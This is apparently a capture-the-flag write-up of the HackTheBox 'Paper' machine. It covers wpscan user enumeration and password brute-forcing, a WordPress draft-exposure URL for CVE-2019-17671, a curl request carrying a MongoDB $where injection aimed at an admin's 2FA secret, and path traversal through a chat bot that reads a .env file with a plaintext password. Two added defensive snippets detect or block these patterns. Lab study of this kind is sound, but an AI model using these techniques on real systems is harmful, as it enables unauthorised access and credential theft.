
HTB paper

The site opens to the default welcome page that ships with Ubuntu; ran dirsearch to pick up some information.

{"metricId":"6793b6fd-c521-4385-9ea0-b743487d53c1","metrics":{"from":"2021-07-01T07:01:26.689Z","to":"2021-07-01T07:29:18.286Z","successfulInstalls":6,"failedInstalls":0}}

Learning a bit of msf along the way.


Unfortunately I got stuck here, so I went back to HTB's guided mode for a nudge.

The hint is "What is the domain for the Wordpress blog?" But what does that have to do with this?

OK, this is an HTB-specific quirk: the default domain is paper.htb. Starting from that, do a subdomain scan. You can actually see it in the network traffic too.


Note that office.paper has to be accessed over http.

Tried weak passwords on /wp-admin; no luck.

Found wpscan, an official tool for detecting WordPress vulnerabilities:

https://github.com/wpscanteam/wpscan

Kali is great, it ships with the latest version.

wpscan --url http://office.paper


wpscan --url http://office.paper -e p

Enumerates plugins; vp enumerates vulnerable plugins, but that requires an API token requested from the official site.

There is a theme; search for it in msf.


Let's try logging in first; enumerate usernames.

wpscan --url http://office.paper -e u

Three users found:

prisonmike
nick
creedthoughts

Brute-force the password:

wpscan --url http://office.paper -U prisonmike -P /home/gw/桌面/test/fuzzDicts-master/passwordDict/top500.txt

Meanwhile, searched for these usernames on the blog and found a hint.


Looks like we need a way to read the drafts.


Found CVE-2019-17671, which matches the running version 5.2.3 exactly: unauthenticated access to content.

est

Micheal please remove the secret from drafts for gods sake!

Hello employees of Blunder Tiffin,
Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.
So, I kindly request you all to take your discussions from the public blog to a more private chat system.
-Nick

# Warning for Michael

Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick

Threat Level Midnight

A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT

[INT:DAY]

Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….

# Secret Registration URL of new Employee chat system

http://chat.office.paper/register/8qozr226AhkCHZdyY

# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.

# Also, stop looking at my drafts. Jeez!

There's a nasty gotcha here: the payloads floating around online all use asc, which doesn't work; switching to dsc makes the drafts visible: /?static=1&order=dsc
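From the defender's side, the draft exposure above leaves a recognisable trace in the web server's access log: a front-page request carrying both a static and an order parameter, served with a 200 by a WordPress older than 5.2.4 (the release that fixed CVE-2019-17671). The following is an added example, not code from the write-up, that scans combined-format access-log lines for that pattern. The log lines and the placeholder.invalid base URL are constructed for illustration.

```javascript
// Added example (not from the write-up): flag access-log requests matching the
// CVE-2019-17671 draft-exposure pattern (WordPress < 5.2.4).
// Sample log lines below are constructed for illustration.

const SAMPLE_LOG = [
  '10.10.14.5 - - [07/Sep/2025:17:20:01 +0000] "GET /?static=1&order=dsc HTTP/1.1" 200 5120 "-" "curl/8.4.0"',
  '10.10.14.5 - - [07/Sep/2025:17:20:09 +0000] "GET /?static=1&order=asc HTTP/1.1" 200 5120 "-" "curl/8.4.0"',
  '10.10.14.9 - - [07/Sep/2025:17:21:30 +0000] "GET /?p=4 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
  '10.10.14.9 - - [07/Sep/2025:17:22:11 +0000] "GET /wp-login.php HTTP/1.1" 200 1900 "-" "Mozilla/5.0"',
];

// Combined log format: client, ident, user, [timestamp], "METHOD path proto", status, ...
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /;

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], ts: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

// The pre-5.2.4 bug is triggered by a `static` parameter together with an `order`
// parameter; the order value (asc or dsc) only affects sorting, so detection
// keys on the pair of parameters rather than on the value.
function isDraftLeakProbe(path) {
  let u;
  try {
    u = new URL(path, 'http://placeholder.invalid'); // base is a placeholder; only the query matters
  } catch (e) {
    return false;
  }
  return u.searchParams.has('static') && u.searchParams.has('order');
}

// Return parsed records for probes that were answered 200, i.e. content was served.
function findDraftLeakProbes(lines) {
  return lines
    .map(parseLine)
    .filter((r) => r !== null && r.status === 200 && isDraftLeakProbe(r.path));
}

for (const hit of findDraftLeakProbes(SAMPLE_LOG)) {
  console.log(`${hit.ts} ${hit.ip} ${hit.method} ${hit.path}`);
}
```

Run it against a real log by replacing SAMPLE_LOG with the file's lines; a hit on a site still on 5.2.3 or older means unpublished posts may already have been read, and the durable fix is the upgrade, not a WAF rule.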

That gives a new URL:

http://chat.office.paper/register/8qozr226AhkCHZdyY

This page lags terribly; I stared at it in a daze. Got in eventually by hammering refresh.

Then noticed this thing can also be hit with a CVE.


Disable two-factor authentication on the account, then find the administrator's email, and that's it.

https://cloud.tencent.com/developer/article/1859035

Had an AI put the command together:

curl -G 'http://chat.office.paper/api/v1/users.list' \
  --data-urlencode 'query={"$where":"this.username==='\''admin'\'' && (()=>{ throw this.services.totp.secret })()"}' \
  -H 'X-Auth-Token: iUj1AzQIi8o8xPsKp21Ck_A6XypHBkYzYLYlq8zxzj5' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Accept-Language: zh-CN' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36' \
  -H 'X-User-Id: ueBvmYywX7advzTJx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Referer: http://chat.office.paper/app/api/server/v1/users.js' \
  -H 'Cookie: rc_uid=ueBvmYywX7advzTJx; rc_token=iUj1AzQIi8o8xPsKp21Ck_A6XypHBkYzYLYlq8zxzj5'

{"users":[{"_id":"cehLnbjB9xv88JFD4","status":"offline","active":true,"name":"aaa","nameInsensitive":"aaa"},{"_id":"5iP6aLxNrs8E5S47Q","username":"DunMiffsys","status":"offline","active":true,"name":"DunMiff/sys","nameInsensitive":"dunmiff/sys"},{"_id":"SrtTqJwvCRmCNErxD","username":"DwightKSchrute","status":"offline","active":true,"name":"Dwight","avatarETag":"zBgJbDdyr4jyRMpTs","nameInsensitive":"dwight"},{"_id":"W2dajtnh4g9Eakc4d","username":"JIM9334","status":"offline","active":true,"name":"Jim","avatarETag":"DdBhzWmNF84rDipeX","nameInsensitive":"jim"},{"_id":"umhc2LunPqcMxpuhB","username":"Receptionitis15","status":"offline","active":true,"name":"Pam","avatarETag":"8PtGntTXt6HyFMwB3","nameInsensitive":"pam"},{"_id":"ueBvmYywX7advzTJx","status":"online","active":true,"name":"aaa","username":"aaa","nameInsensitive":"aaa"},{"_id":"vzADtHxN58iiaNY95","username":"actuallyoscar","status":"offline","active":true,"name":"Oscar","avatarETag":"eNbvD2htfoiRER4Xc","nameInsensitive":"oscar"},{"_id":"3pACoij7SH35924pr","username":"catlover","status":"offline","active":true,"name":"Angela","avatarETag":"4hEQXscy32FsLJSR7","nameInsensitive":"angela"},{"_id":"w4LmaNZWjyBtDgjpp","username":"creedthoughts","status":"offline","active":true,"name":"Creed","avatarETag":"DduKqSqtQW8eq8fdN","nameInsensitive":"creed"},{"_id":"d22WtYvu9SDvMcTLC","username":"dwightschrute","status":"offline","active":true,"name":"Dwight Schrute","avatarETag":"rAMJJeSFDGziAatoo","nameInsensitive":"dwight schrute"},{"_id":"Q74BkesCHPaRKYjak","username":"hrtoby","status":"offline","active":true,"name":"Toby","avatarETag":"CqFFEbHsDwMQnh4Xz","nameInsensitive":"toby"},{"_id":"MdJX6Kdc3STveZu4Y","username":"kellylikescupcakes","status":"offline","active":true,"name":"Kelly","avatarETag":"nyPiX8DDFzg6ZtgjR","nameInsensitive":"kelly"},{"_id":"DPq2mKNh9m5wENM2p","username":"meredithpalmer","status":"offline","active":true,"name":"Meredith","avatarETag":"49pxS3jA7S24KfsG3","nameInsensitive":"meredith"},{"_id":"NQ2JvGXL8gr7msi7o","username":"nick","status":"offline","active":true,"name":"nick","avatarETag":"cNdxrAfP7Pr5WCirT","nameInsensitive":"nick"},{"_id":"PvSX4dgWzQhnmNujT","status":"offline","active":true,"name":"pb","username":"pb","nameInsensitive":"pb"},{"_id":"aLFDk9yzAhxp6JzrJ","username":"phyllisbobvancefromvancerefigeration","status":"offline","active":true,"name":"Phyllis Vance","avatarETag":"XKtDM4fSXZ3Xf2Ncg","nameInsensitive":"phyllis vance"},{"_id":"ps6gjvimJ3DxeZA86","status":"offline","active":true,"name":"Michael Scott","username":"prisonmike","avatarETag":"Lt5nBQ6hccJnrmjqg","nameInsensitive":"michael scott"},{"_id":"siKFfAEiy9JnJwfCk","username":"realastonkutcher","status":"offline","active":true,"name":"Kevin","avatarETag":"WiGi6HYTadKj5Zf9q","nameInsensitive":"kevin"},{"_id":"qzPLDHsqfYEcJTMJu","username":"realmeredithpalmer","status":"offline","active":true,"name":"Meredith Palmer","avatarETag":"tKenMzo44RFRdEPeM","nameInsensitive":"meredith palmer"},{"_id":"WoxmTzWbvoijWkN5X","username":"recyclops","status":"online","active":true,"name":"RecyclopsBot","avatarETag":"L9pEEpwebBTXPKgqJ","nameInsensitive":"recyclopsbot"},{"_id":"rocket.cat","name":"Rocket.Cat","username":"rocket.cat","status":"online","active":true,"avatarETag":null,"nameInsensitive":"rocket.cat"},{"_id":"BcPDYqH4boQNR3nbE","username":"stanhudson","status":"offline","active":true,"name":"Stanley Hudson","avatarETag":"8FkwWpY62pnZ2dQnm","nameInsensitive":"stanley hudson"},{"_id":"gtNuENR8pianEYMHt","username":"wuphfryan","status":"offline","active":true,"name":"Ryan","avatarETag":"R4XbB4zfGpJbppFC8","nameInsensitive":"ryan"}],"count":23,"offset":0,"total":23,"success":true}
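The users.list request above relies on the API parsing the query parameter as JSON and forwarding it to MongoDB, so an operator such as $where would execute JavaScript against the collection. What follows is an added example, not Rocket.Chat's code, of how a server should vet a client-supplied filter before it reaches the database; the operator deny-list and the sample queries are my own construction.

```javascript
// Added example (not Rocket.Chat code): reject server-side JavaScript operators in a
// client-supplied MongoDB filter before it is handed to the database.

const FORBIDDEN_OPERATORS = new Set(['$where', '$function', '$accumulator', '$expr']);

// Walk the parsed filter and collect every forbidden operator key, at any depth,
// so that nesting inside $or / $and arrays does not hide it.
function findForbiddenOperators(node, found = []) {
  if (Array.isArray(node)) {
    for (const item of node) findForbiddenOperators(item, found);
  } else if (node !== null && typeof node === 'object') {
    for (const [key, value] of Object.entries(node)) {
      if (FORBIDDEN_OPERATORS.has(key)) found.push(key);
      findForbiddenOperators(value, found);
    }
  }
  return found;
}

// Parse a raw `query` string and decide whether it may be passed on.
// Returns { ok: true, filter } or { ok: false, reason }.
function vetClientQuery(raw) {
  let filter;
  try {
    filter = JSON.parse(raw);
  } catch (e) {
    return { ok: false, reason: 'query is not valid JSON' };
  }
  if (filter === null || typeof filter !== 'object' || Array.isArray(filter)) {
    return { ok: false, reason: 'query must be a JSON object' };
  }
  const bad = findForbiddenOperators(filter);
  if (bad.length > 0) {
    return { ok: false, reason: `forbidden operator(s): ${[...new Set(bad)].join(', ')}` };
  }
  return { ok: true, filter };
}

// Constructed inputs for illustration.
const INJECTED = '{"$where":"this.username===\'admin\'"}';
const NESTED = '{"$or":[{"username":"nick"},{"$where":"return true"}]}';
const BENIGN = '{"username":"nick"}';

for (const q of [INJECTED, NESTED, BENIGN]) {
  const verdict = vetClientQuery(q);
  console.log(verdict.ok ? `accepted ${q}` : `rejected ${q}: ${verdict.reason}`);
}
```

A deny-list is the minimal fix. The stronger one is an allow-list of queryable fields, so that no operator supplied by the client is ever forwarded, and a log line for every rejection so that probing of the endpoint shows up in monitoring.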

Tried it and it didn't work. Went back to check: the Rocket.Chat version in use is 3.16.3, and there is no good CVE to exploit. So back to the chat room, where I found a bot with special functions.



Found that ../ bypasses the restriction, so list can read arbitrary files.


Read the .env file:

<!=====Contents of file ../hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
<!=====End of file ../hubot/.env=====>

What is this password good for? Its creator is dwight, and we are in his directory; can we SSH in with it?
